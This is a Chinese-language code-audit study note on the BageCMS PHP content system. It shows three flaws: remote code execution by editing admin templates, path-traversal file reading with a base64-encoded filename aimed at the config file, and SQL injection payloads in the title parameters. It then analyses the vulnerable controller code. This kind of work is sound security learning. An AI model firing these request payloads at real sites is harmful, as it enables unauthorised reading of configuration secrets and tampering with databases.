php代码审计学习----八哥cms代码审计
php代码审计学习----八哥cms代码审计
源码
https://github.com/Betsy0/CMSVulSource/tree/main/bagecms
环境搭建
打开php.ini
全局搜索soap
将extension前的;删掉
创建一个名为bagecms的数据库
create database bagecms;
输入网址/index.php?r=install
完成安装
然后再输入/index.php?r=admini
漏洞复现
1.模板渲染实现RCE
登录进后台
编辑question目录下的index.php
2.任意文件读取
点击提交,抓包
filename进行base64加密
?r=admini/Template/Update&filename=Li4vLi4vLi4vcHJvdGVjdGVkL2NvbmZpZy9tYWluLnBocA==
3.SQL注入
?r=admini/post/index&catalogId=&title=fafadf&titleAlias=fad') or 1=1%23&searchsubmit=查询
?r=admini/post/index&catalogId=&title=fafadf&titleAlias=fad') or 1=2%23&searchsubmit=查询
或者
?r=admini/post/index&titleAlias=fad') or 1=1%23
?r=admini/post/index&titleAlias=fad') or 1=2%23
?r=admini/post/index&title=fad') or 1=1%23
?r=admini/post/index&title=fad') or 1=2%23
代码审计
命令执行代码审计
1.因为是在模板编辑处实现了RCE,所以搜索"模板"
2.定位到编辑这里
/**
* 编辑
*
* @param $id
*/
public function actionUpdate( $filename ) {
parent::_acl();
$filename = trim( $this->_gets->getParam( 'filename' ) );
$content = trim( $this->_gets->getParam( 'content' ) );
if ( isset( $_POST['content'] ) ) {
$fileputcontent = file_put_contents( $this->_themePath.DS.'views'.DS.XUtils::b64decode( $filename ), $content );
if ( $fileputcontent == true ) {
parent::_adminiLogger( array( 'catalog'=>'update', 'intro'=>'编辑模板' ) );
$this->redirect( array ( 'index' ) );
}
}
$data['filename'] = XUtils::b64decode( $filename );
$data['content'] = htmlspecialchars( file_get_contents( $this->_themePath.DS.'views'.DS.XUtils::b64decode( $filename ) ) );
$this->render( 'update', $data );
}
在后台编辑模板后发现直接在修改了源码(/themes/default/views/question/index.php)
2.任意文件读取
还是刚才那处
filename路径进行base64加密,所以可以进行目录遍历读取配置文件
遗留问题:?r=admini/template/update是怎么构造出来的
3.SQL注入
可以全局搜索一些常见的SQL语句成分,比如SELECT,LIKE等
public function actionIndex ()
{
parent::_acl();
$model = new Page();
$criteria = new CDbCriteria();
$condition = '1';
$title = $this->_gets->getParam('title');
$titleAlias = $this->_gets->getParam('titleAlias');
$title && $condition .= ' AND title LIKE \'%' . $title . '%\'';
$titleAlias && $condition .= ' AND title_alias LIKE \'%' . $titleAlias . '%\'';
$criteria->condition = $condition;
$criteria->order = 't.id DESC';
$count = $model->count($criteria);
$pages = new CPagination($count);
$pages->pageSize = 13;
$pageParams = XUtils::buildCondition($_GET, array ('page_name_alias' , 'page_name' ));
$pages->params = is_array($pageParams) ? $pageParams : array ();
$criteria->limit = $pages->pageSize;
$criteria->offset = $pages->currentPage * $pages->pageSize;
$result = $model->findAll($criteria);
$this->render('index', array ('datalist' => $result , 'pagebar' => $pages ));
}
index.php
$(document).ready(function(){
$("#title").val('<?php echo Yii::app()->request->getParam('title')?>');
$("#titleAlias").val('<?php echo Yii::app()->request->getParam('titleAlias')?>');
$("#catalogId").val('<?php echo Yii::app()->request->getParam('catalogId')?>');
没有任何过滤
可以插入') or 1=1%23
至于url可以为,title可以换为titleAlias
r=admini/post/index&title=fad') or 1=1%23
遗留问题:为什么是')
闭合,而不是'
闭合